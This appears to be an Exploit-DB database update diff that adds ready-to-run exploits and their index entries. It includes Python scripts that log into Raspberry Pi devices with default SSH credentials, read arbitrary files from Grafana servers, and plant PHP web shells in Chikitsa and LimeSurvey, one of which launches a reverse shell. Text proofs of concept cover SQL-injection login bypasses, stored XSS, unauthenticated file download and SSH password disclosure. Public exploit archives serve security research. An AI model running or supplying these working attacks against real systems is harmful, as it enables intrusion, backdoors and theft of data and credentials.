DB: 2021-12-10

11 changes to exploits/shellcodes

MTPutty 1.0.1.21 - SSH Password Disclosure

Raspberry Pi 5.10 - Default Credentials
Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated)
LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)
TestLink 1.19 - Arbitrary File Download (Unauthenticated)
Student Management System 1.0 - SQLi Authentication Bypass
Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated)
Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass
Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)

exploits/linux/remote/50576.py

@@ -0,0 +1,34 @@
+# Exploit Title: Raspberry Pi 5.10 - Default Credentials
+# Date: 08/12/2021
+# Exploit Author: netspooky
+# Vendor Homepage: https://www.raspberrypi.com/
+# Software Link: https://www.raspberrypi.com/software/operating-systems/
+# Version: Raspberry Pi OS <= 5.10
+# Tested on: Raspberry Pi OS 5.10
+# CVE : CVE-2021-38759
+
+# Initial Release: https://twitter.com/netspooky/status/1468603668266209280
+
+# Run: $ python3 exploit.py IP
+
+import paramiko
+
+import sys
+
+h=sys.argv[1]
+
+u="pi"
+
+p="raspberry"
+
+c=paramiko.client.SSHClient()
+
+c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+c.connect(h,username=u,password=p)
+
+i,o,e=c.exec_command("id")
+
+print(o.read())
+
+c.close()

exploits/multiple/webapps/50581.py

@@ -0,0 +1,104 @@
+# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
+# Date: 08/12/2021
+# Exploit Author: s1gh
+# Vendor Homepage: https://grafana.com/
+# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
+# Version: V8.0.0-beta1 through V8.3.0
+# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.
+# CVE: CVE-2021-43798
+# Tested on: Debian 10
+# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import requests
+import argparse
+import sys
+from random import choice
+
+plugin_list = [
+    "alertlist",
+    "annolist",
+    "barchart",
+    "bargauge",
+    "candlestick",
+    "cloudwatch",
+    "dashlist",
+    "elasticsearch",
+    "gauge",
+    "geomap",
+    "gettingstarted",
+    "grafana-azure-monitor-datasource",
+    "graph",
+    "heatmap",
+    "histogram",
+    "influxdb",
+    "jaeger",
+    "logs",
+    "loki",
+    "mssql",
+    "mysql",
+    "news",
+    "nodeGraph",
+    "opentsdb",
+    "piechart",
+    "pluginlist",
+    "postgres",
+    "prometheus",
+    "stackdriver",
+    "stat",
+    "state-timeline",
+    "status-histor",
+    "table",
+    "table-old",
+    "tempo",
+    "testdata",
+    "text",
+    "timeseries",
+    "welcome",
+    "zipkin"
+]
+
+def exploit(args):
+    s = requests.Session()
+    headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }
+
+    while True:
+        file_to_read = input('Read file > ')
+
+        try:
+            url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
+            req = requests.Request(method='GET', url=url, headers=headers)
+            prep = req.prepare()
+            prep.url = url
+            r = s.send(prep, verify=False, timeout=3)
+
+            if 'Plugin file not found' in r.text:
+                print('[-] File not found\n')
+            else:
+                if r.status_code == 200:
+                    print(r.text)
+                else:
+                    print('[-] Something went wrong.')
+                    return
+        except requests.exceptions.ConnectTimeout:
+            print('[-] Request timed out. Please check your host settings.\n')
+            return
+        except Exception:
+            pass
+
+def main():
+    parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
+    parser.add_argument('-H',dest='host',required=True, help="Target host")
+    args = parser.parse_args()
+
+    try:
+        exploit(args)
+    except KeyboardInterrupt:
+        return
+
+
+if __name__ == '__main__':
+    main()
+    sys.exit(0)

exploits/php/webapps/50571.py

@@ -0,0 +1,64 @@
+# Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated)
+# Date: 03/12/2021
+# Exploit Author: 0z09e (https://twitter.com/0z09e)
+# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
+# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
+# Version: 2.0.2
+# Tested on: Ubuntu
+
+import requests
+import os
+import argparse
+
+def login(session , target , username , password):
+	print("[+] Attempting to login with the credential")
+	url = target + "/index.php/login/valid_signin"
+	login_data = {"username" : username , "password" : password}
+	session.post(url , data=login_data , verify=False)
+	return session
+
+def generate_plugin():
+	print("[+] Generating a malicious plugin")
+	global tmp_dir
+	tmp_dir = os.popen("mktemp -d").read().rstrip()
+	open(f"{tmp_dir}/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
+	os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read()
+
+def upload_plugin(session , target):
+	print("[+] Uploading the plugin into the server.")
+	url = target + "/index.php/module/upload_module/"
+	file = open(f"{tmp_dir}/rce.zip" , "rb").read()
+	session.post(url , verify=False ,files = {"extension" : ("rce.zip" , file)})
+	session.get(target + "/index.php/module/activate_module/rce" , verify=False)
+	print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php")
+	print(f"[+] Example Output : {requests.get(target +'/application/modules/rce.php?cmd=id' , verify=False).text}")
+
+def main():
+	parser = argparse.ArgumentParser("""
+		        __    _ __   _ __
+  _____/ /_  (_) /__(_) /__________ _
+ / ___/ __ \/ / //_/ / __/ ___/ __ `/
+/ /__/ / / / / ,< / / /_(__  ) /_/ /
+\___/_/ /_/_/_/|_/_/\__/____/\__,_/
+
+Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution :
+POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)
+	req_args = parser.add_argument_group('required arguments')
+	req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
+	req_args.add_argument("-u" , "--username" , help="Username" , required=True)
+	req_args.add_argument("-p" , "--password" , help="password", required=True)
+	args = parser.parse_args()
+
+	target = args.URL
+	if target[-1] == "/":
+		target = target[:-1]
+	username = args.username
+	password = args.password
+
+	session = requests.session()
+	login(session , target , username , password)
+	generate_plugin()
+	upload_plugin(session , target)
+
+if __name__ == "__main__":
+	main()

exploits/php/webapps/50572.py

@@ -0,0 +1,85 @@
+# Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
+# Date: 03/12/2021
+# Exploit Author: 0z09e (https://twitter.com/0z09e)
+# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
+# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
+# Version: 2.0.2
+# Tested on: Ubuntu
+
+import requests
+import os
+from zipfile import ZipFile
+import argparse
+
+
+
+
+def login(session , target , username , password):
+	print("[+] Attempting to login with the credential")
+	url = target + "/index.php/login/valid_signin"
+	login_data = {"username" : username , "password" : password}
+	session.post(url , data=login_data , verify=False)
+	return session
+
+
+def download_backup( session , target):
+	print("[+] Downloading the backup (This may take some time)")
+	url = target + "/index.php/settings/take_backup/"
+	backup_req = session.get(url , verify=False)
+	global tmp_dir
+	tmp_dir = os.popen("mktemp -d").read().rstrip()
+	open(tmp_dir + "/backup_raw.zip" , "wb").write(backup_req.content)
+	print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip")
+
+
+def modify_backup():
+	print("[+] Modifying the backup by injecting a backdoor.")
+	zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r')
+	zf.extractall(tmp_dir)
+	zf.close()
+	open(tmp_dir + "/uploads/media/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
+	os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read()
+
+
+def upload_backup(session , target):
+	print("[+] Uploading the backup back into the server.(This may take some time)")
+	url = target + "/index.php/settings/restore_backup"
+	file = open(f"{tmp_dir}/backup_modified.zip" , "rb").read()
+	session.post(url , verify=False ,files = {"backup" : ("backup-modified.zip" , file)})
+	print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")
+	print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}")
+
+
+
+
+def main():
+	parser = argparse.ArgumentParser("""
+		        __    _ __   _ __
+  _____/ /_  (_) /__(_) /__________ _
+ / ___/ __ \/ / //_/ / __/ ___/ __ `/
+/ /__/ / / / / ,< / / /_(__  ) /_/ /
+\___/_/ /_/_/_/|_/_/\__/____/\__,_/
+
+Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution :
+POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)
+	req_args = parser.add_argument_group('required arguments')
+	req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
+	req_args.add_argument("-u" , "--username" , help="Username" , required=True)
+	req_args.add_argument("-p" , "--password" , help="password", required=True)
+	args = parser.parse_args()
+
+	target = args.URL
+	if target[-1] == "/":
+		target = target[:-1]
+	username = args.username
+	password = args.password
+
+	session = requests.session()
+	login(session ,target , username , password)
+	download_backup(session , target )
+	modify_backup()
+	upload_backup(session , target)
+
+
+if __name__ == "__main__":
+	main()

exploits/php/webapps/50573.py

@@ -0,0 +1,111 @@
+# Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)
+# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
+# Date: 05/12/2021
+# Exploit Author: Y1LD1R1M
+# Vendor Homepage: https://www.limesurvey.org/
+# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
+# Version: 5.2.x
+# Tested on: Kali Linux 2021.3
+# Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+print("_______________LimeSurvey RCE_______________")
+print("")
+print("")
+print("Usage: python exploit.py URL username password port")
+print("Example: python exploit.py http://192.26.26.128 admin password 80")
+print("")
+print("")
+print("== ██╗   ██╗ ██╗██╗     ██████╗  ██╗██████╗  ██╗███╗   ███╗ ==")
+print("== ╚██╗ ██╔╝███║██║     ██╔══██╗███║██╔══██╗███║████╗ ████║ ==")
+print("==  ╚████╔╝ ╚██║██║     ██║  ██║╚██║██████╔╝╚██║██╔████╔██║ ==")
+print("==   ╚██╔╝   ██║██║     ██║  ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==")
+print("==    ██║    ██║███████╗██████╔╝ ██║██║  ██║ ██║██║ ╚═╝ ██║ ==")
+print("==    ╚═╝    ╚═╝╚══════╝╚═════╝  ╚═╝╚═╝  ╚═╝ ╚═╝╚═╝     ╚═╝ ==")
+print("")
+print("")
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+port = sys.argv[4]
+
+req = requests.session()
+print("[+] Retrieving CSRF token...")
+loginPage = req.get(url+"/index.php/admin/authentication/sa/login")
+response = loginPage.text
+s = BeautifulSoup(response, 'html.parser')
+CSRF_token = s.findAll('input')[0].get("value")
+print(CSRF_token)
+print("[+] Sending Login Request...")
+
+login_creds = {
+          "user": username,
+          "password": password,
+          "authMethod": "Authdb",
+          "loginlang":"default",
+          "action":"login",
+          "width":"1581",
+          "login_submit": "login",
+          "YII_CSRF_TOKEN": CSRF_token
+}
+print("[+]Login Successful")
+print("")
+print("[+] Upload Plugin Request...")
+print("[+] Retrieving CSRF token...")
+filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS
+login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds)
+UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index")
+response = UploadPage.text
+s = BeautifulSoup(response, 'html.parser')
+CSRF_token2 = s.findAll('input')[0].get("value")
+print(CSRF_token2)
+Upload_creds = {
+          "YII_CSRF_TOKEN":CSRF_token2,
+          "lid":"$lid",
+          "action": "templateupload"
+}
+file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds)
+UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm")
+response = UploadPage.text
+print("[+] Plugin Uploaded Successfully")
+print("")
+print("[+] Install Plugin Request...")
+print("[+] Retrieving CSRF token...")
+
+InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin")
+response = InstallPage.text
+s = BeautifulSoup(response, 'html.parser')
+CSRF_token3 = s.findAll('input')[0].get("value")
+print(CSRF_token3)
+Install_creds = {
+          "YII_CSRF_TOKEN":CSRF_token3,
+          "isUpdate": "false"
+}
+file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds)
+print("[+] Plugin Installed Successfully")
+print("")
+print("[+] Activate Plugin Request...")
+print("[+] Retrieving CSRF token...")
+ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate")
+response = ActivatePage.text
+s = BeautifulSoup(response, 'html.parser')
+CSRF_token4 = s.findAll('input')[0].get("value")
+print(CSRF_token4)
+Activate_creds = {
+          "YII_CSRF_TOKEN":CSRF_token4,
+          "pluginId": "1" # CHANGE THIS
+}
+file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds)
+print("[+] Plugin Activated Successfully")
+print("")
+print("[+] Reverse Shell Starting, Check Your Connection :)")
+shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS

exploits/php/webapps/50578.txt

@@ -0,0 +1,15 @@
+# Exploit Title: TestLink 1.19 - Arbitrary File Download (Unauthenticated)
+# Google Dork: inurl:/testlink/
+# Date: 07/12/2021
+# Exploit Author: Gonzalo Villegas (Cl34r)
+# Exploit Author Homepage: https://nch.ninja
+# Vendor Homepage: https://testlink.org/
+# Version:1.16 <= 1.19
+# CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+
+You can download files from "/lib/attachments/attachmentdownload.php", passing directly in URL the id of file listed on database, otherwise you can iterate the id parameter (from 1)
+
+Vulnerable URL: "http://HOST/lib/attachments/attachmentdownload.php?id=ITERATE_THIS_ID&skipCheck=1"
+
+for research notes:
+https://nch.ninja/blog/unauthorized-file-download-attached-files-testlink-116-119/

exploits/php/webapps/50579.txt

@@ -0,0 +1,34 @@
+# Exploit Title: Student Management System 1.0 - SQLi Authentication Bypass
+# Date: 2020-07-06
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://www.sourcecodester.com/php/14268/student-management-system.html
+# Version: 1.0
+# Tested on: Windows & WampServer
+# CVE: CVE-2020-23935
+
+1- Go to following url. >> http://(HOST)/admin/login.php
+2- We can login succesfully with SQL bypass method.
+
+-- Username = admin'#
+-- Password = (Write Something)
+
+NOTE: Default username and password is admin:admin.
+
+(( HTTP Request ))
+
+POST /process.php HTTP/1.1
+Host: (HOST)
+Connection: keep-alive
+Content-Length: 51
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://(HOST)/
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://(HOST)/index.php?q=login
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: navigate-tinymce-scroll=%7B%7D; navigate-language=en; PHPSESSID=1asdsd3lf9u2d7e82on6rjl
+
+U_USERNAME=admin'#&U_PASS=123123&sidebarLogin=

exploits/php/webapps/50582.txt

@@ -0,0 +1,104 @@
+# Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass
+# Exploit Author: able403
+# Date: 08/12/2021
+# Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
+# Version: 1.0
+# Tested on: windows 10
+# Vulnerable page: Actions.php
+# VUlnerable parameters: "username"
+
+Technical description:
+
+An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication.
+
+Steps to exploit:
+
+1) Navigate to http://localhost/login.php
+
+2) Insert your payload in the user or password field
+
+3) Click login
+
+Proof of concept (Poc):
+
+The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form -
+
+123'+or+1=1+--+-
+
+
+
+
+---
+
+
+
+
+POST /Actions.php?a=employee_login HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+
+Accept: application/json, text/javascript, */*; q=0.01
+
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+
+Accept-Encoding: gzip, deflate
+
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+X-Requested-With: XMLHttpRequest
+
+Content-Length: 43
+
+Origin: http://edtms.com
+
+Connection: close
+
+Referer: http://edtms.com/login.php
+
+Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
+
+
+
+
+email=admin'+or+1=1+--+-&password=123123213
+
+
+
+
+response
+
+
+
+
+HTTP/1.1 200 OK
+
+Date: Wed, 10 Nov 2021 02:23:38 GMT
+
+Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
+
+X-Powered-By: PHP/8.0.2
+
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+
+Cache-Control: no-store, no-cache, must-revalidate
+
+Pragma: no-cache
+
+Connection: close
+
+Content-Type: text/html; charset=UTF-8
+
+Content-Length: 48
+
+
+
+
+{"status":"success","msg":"Login successfully."}
+
+
+
+
+---

exploits/php/webapps/50583.txt

@@ -0,0 +1,222 @@
+# Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
+# Exploit Author: able403
+# Date: 08/12/2021
+# Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
+# Version: 1.0
+# Tested on: windows 10
+# Vulnerable page: ?page=view_task&id=2
+
+Technical description:
+
+A stored XSS online event booking and reservation system. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more.
+
+xss-1:
+
+1) Navigate to http://localhost/?page=view_task&id=2 and clink "edit task"
+2) Insert your payload in the "title" and "Task Description" parameter parameter
+3) Click save
+
+Proof of concept (Poc):
+
+The following payload will allow you to run the javascript -
+
+"><img src=# onerror=alert(123)>
+
+---
+POST /Actions.php?a=save_task HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+
+Accept: application/json, text/javascript, */*; q=0.01
+
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+
+Accept-Encoding: gzip, deflate
+
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+X-Requested-With: XMLHttpRequest
+
+Content-Length: 312
+
+Origin: http://localhost
+
+Connection: close
+
+Referer: http://localhost/?page=tasks
+
+Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
+
+
+
+
+id=2&title=Task+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EThis+is+another+task+for+you.%3C%2Fp%3E%3Cp%3EThis+description+has+been+updated%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E
+
+
+
+
+
+
+
+xss-2
+
+1) Navigate to http://localhost.com/?page=manage_account
+2) Insert your payload in the "full name" or "contact" or "email"  parameter parameter
+
+Proof of concept (Poc):
+
+The following payload will allow you to run the javascript -
+
+"><img src=# onerror=alert(123)>
+
+
+
+
+--
+
+POST /Actions.php?a=update_credentials_employee HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+
+Accept: application/json, text/javascript, */*; q=0.01
+
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+
+Accept-Encoding: gzip, deflate
+
+X-Requested-With: XMLHttpRequest
+
+Content-Type: multipart/form-data; boundary=---------------------------27882107026209045483167935384
+
+Content-Length: 1613
+
+Origin: http://localhost
+
+Connection: close
+
+Referer: http://localhost/?page=manage_account
+
+Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
+
+
+
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="id"
+
+
+
+
+1
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="fullname"
+
+
+
+
+John D Smith
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="gender"
+
+
+
+
+Male
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="dob"
+
+
+
+
+1997-06-23
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="contact"
+
+
+
+
+098123456789"><img src=# onerror=alert(123)>
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="email"
+
+
+
+
+jsmith@sample.com
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="address"
+
+
+
+
+Sample Address
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="department_id"
+
+
+
+
+1
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="email"
+
+
+
+
+jsmith@sample.com
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="password"
+
+
+
+
+
+
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="old_password"
+
+
+
+
+
+
+
+-----------------------------27882107026209045483167935384
+
+Content-Disposition: form-data; name="avatar"; filename=""
+
+Content-Type: application/octet-stream
+
+
+
+
+
+
+
+-----------------------------27882107026209045483167935384--

exploits/windows/local/50574.txt

@@ -0,0 +1,15 @@
+# Exploit Title: MTPutty 1.0.1.21 - SSH Password Disclosure
+# Exploit Author: Sedat Ozdemir
+# Version: 1.0.1.21
+# Date: 06/12/2021
+# Vendor Homepage: https://ttyplus.com/multi-tabbed-putty/
+# Tested on: Windows 10
+
+Proof of Concept
+================
+
+Step 1: Open MTPutty and add a new SSH connection.
+Step 2: Click double times and connect to the server.
+Step 3: Run run “Get-WmiObject Win32_Process | select name, commandline |
+findstr putty.exe” on powershell.
+Step 4: You can see the hidden password on PowerShell terminal.

files_exploits.csv

@@ -11423,6 +11423,7 @@ id,file,description,date,author,type,platform,port
 50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
 50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
 50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
+50574,exploits/windows/local/50574.txt,"MTPutty 1.0.1.21 - SSH Password Disclosure",1970-01-01,"Sedat Ozdemir",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18576,6 +18577,7 @@ id,file,description,date,author,type,platform,port
 50567,exploits/hardware/remote/50567.txt,"Auerswald COMpact 8.0B - Privilege Escalation",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
 50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
+50576,exploits/linux/remote/50576.py,"Raspberry Pi 5.10 - Default Credentials",1970-01-01,netspooky,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44658,3 +44660,12 @@ id,file,description,date,author,type,platform,port
 50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
 50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,
 50570,exploits/php/webapps/50570.txt,"Croogo 3.0.2 - Remote Code Execution (Authenticated)",1970-01-01,"Deha Berkin Bir",webapps,php,
+50571,exploits/php/webapps/50571.py,"Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)",1970-01-01,0z09e,webapps,php,
+50572,exploits/php/webapps/50572.py,"Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated)",1970-01-01,0z09e,webapps,php,
+50573,exploits/php/webapps/50573.py,"LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Y1LD1R1M,webapps,php,
+50578,exploits/php/webapps/50578.txt,"TestLink 1.19 - Arbitrary File Download (Unauthenticated)",1970-01-01,"Gonzalo Villegas",webapps,php,
+50579,exploits/php/webapps/50579.txt,"Student Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Enes Özeser",webapps,php,
+50580,exploits/php/webapps/50580.py,"Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
+50581,exploits/multiple/webapps/50581.py,"Grafana 8.3.0 - Directory Traversal and Arbitrary File Read",1970-01-01,s1gh,webapps,multiple,
+50582,exploits/php/webapps/50582.txt,"Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass",1970-01-01,able403,webapps,php,
+50583,exploits/php/webapps/50583.txt,"Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)",1970-01-01,able403,webapps,php,